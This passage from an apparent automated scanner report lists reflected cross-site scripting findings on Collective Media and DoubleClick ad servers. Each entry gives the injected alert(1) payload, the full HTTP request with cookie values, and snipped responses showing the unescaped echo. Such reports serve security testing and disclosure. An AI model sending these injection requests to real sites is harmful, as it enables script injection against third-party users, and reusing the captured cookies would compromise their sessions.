Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.71. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.bosherald/ent_fr

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a16d'-alert(1)-'c6afe39cbf2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.bosherald2a16d'-alert(1)-'c6afe39cbf2/ent_fr;sz=300x250;net=q1;ord=269011797?;env=ifr;ord1=820052;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.72. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.bosherald/ent_fr

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 525dc'-alert(1)-'e67344382a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.bosherald/ent_fr525dc'-alert(1)-'e67344382a2;sz=300x250;net=q1;ord=269011797?;env=ifr;ord1=820052;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.73. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.bosherald/ent_fr

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b55c'-alert(1)-'61ca1119251 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.bosherald/ent_fr?5b55c'-alert(1)-'61ca1119251=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

4.74. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.bosherald/ent_fr

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27bc0'-alert(1)-'5df599feb72 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/q1.bosherald/ent_fr;sz=27bc0'-alert(1)-'5df599feb72 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:33 GMT
Connection: close
Content-Length: 7619

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
6073,11d765b6a10b1b3,none,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h;;sz=27bc0'-alert(1)-'5df599feb72;contx=none;dc=w;btg=q1.none_h;btg=q1.ent_m;btg=q1.polit_l;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=
...[SNIP]...

4.75. http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab2ef'-alert(1)-'63371fe5300 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadjab2ef'-alert(1)-'63371fe5300/uol.collective/ColeHaan_MM_Openness_CMN_13109;dcove=o;sz=300x250;net=uol;ord=1655200;env=ifr;ord1=605483;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.76. http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 577b8'-alert(1)-'80d1667b19e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/uol.collective577b8'-alert(1)-'80d1667b19e/ColeHaan_MM_Openness_CMN_13109;dcove=o;sz=300x250;net=uol;ord=1655200;env=ifr;ord1=605483;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.77. http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9d04'-alert(1)-'7d08933297b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109b9d04'-alert(1)-'7d08933297b;dcove=o;sz=300x250;net=uol;ord=1655200;env=ifr;ord1=605483;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:47 GMT
Connection: close
Content-Length: 7822

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("uol-16390671_1296266087","http://ad.doubleclick.net/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109b9d04'-alert(1)-'7d08933297b;net=uol;u=,uol-16390671_1296266087,11d765b6a10b1b3,ent,mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-c
...[SNIP]...

4.78. http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [dcove parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109

Issue detail

The value of the dcove request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 919b4'-alert(1)-'321da0909a2 was submitted in the dcove parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109;dcove=919b4'-alert(1)-'321da0909a2 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:38 GMT
Connection: close
Content-Length: 7768

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h;;dcove=919b4'-alert(1)-'321da0909a2;contx=none;dc=w;btg=mm.aa1;btg=mm.ac1;btg=mm.ad1;btg=mm.ae5;btg=mm.af5;btg=mm.ak1;btg=mm.ap5;btg=mm.aq1;btg=mm.ar1;btg=mm.au1;btg=mm.da1;btg=mm.db2;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;bt
...[SNIP]...

4.79. http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e086f'-alert(1)-'c94bc7b20f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109?e086f'-alert(1)-'c94bc7b20f7=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7761
Date: Sat, 29 Jan 2011 05:19:40 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("uol-57677525_1296278380","http://ad.doubleclick.net//uol.collective/ColeHaan_MM_Openness_CMN_13109?e086f'-alert(1)-'c94bc7b20f7=1;net=uol;u=,uol-57677525_1296278380,11d765b6a10b1b3,none,mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfa
...[SNIP]...

4.80. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de995"-alert(1)-"613dfd0b404 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0de995"-alert(1)-"613dfd0b404&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6003
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:22 GMT
Expires: Sat, 29 Jan 2011 05:20:22 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0de995"-alert(1)-"613dfd0b404&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fscUrlClickTagFound = false;
v
...[SNIP]...

4.81. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee1bd'-alert(1)-'3c2321e8777 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0ee1bd'-alert(1)-'3c2321e8777&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6003
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:23 GMT
Expires: Sat, 29 Jan 2011 05:20:23 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0ee1bd'-alert(1)-'3c2321e8777&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\">
...[SNIP]...

4.82. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [forced_click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48133'-alert(1)-'2b1ac901df0 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0&tp=8&forced_click=48133'-alert(1)-'2b1ac901df0 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5961
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:27 GMT
Expires: Sat, 29 Jan 2011 05:20:27 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
a9e/7/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0&tp=8&forced_click=48133'-alert(1)-'2b1ac901df0http://www.marriott.com/setSCtracking.mi?scid=2011118D1878000004&mid=/marriott/hotels-resorts/weekendbonus.mi\">
...[SNIP]...

4.83. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [forced_click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f109"-alert(1)-"9fa48e39d89 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0&tp=8&forced_click=9f109"-alert(1)-"9fa48e39d89 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5961
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:27 GMT
Expires: Sat, 29 Jan 2011 05:20:27 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
a9e/7/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0&tp=8&forced_click=9f109"-alert(1)-"9fa48e39d89http://www.marriott.com/setSCtracking.mi?scid=2011118D1878000004&mid=/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = ""
...[SNIP]...

4.84. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [m parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5824"-alert(1)-"01a281d1dec was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6a5824"-alert(1)-"01a281d1dec&sid=54393&c=0&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6003
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:19 GMT
Expires: Sat, 29 Jan 2011 05:20:19 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6a5824"-alert(1)-"01a281d1dec&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fscUrlClickTagFou
...[SNIP]...

4.85. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [m parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 985b8'-alert(1)-'e81dfefbfce was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6985b8'-alert(1)-'e81dfefbfce&sid=54393&c=0&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6003
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:20 GMT
Expires: Sat, 29 Jan 2011 05:20:20 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6985b8'-alert(1)-'e81dfefbfce&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\">
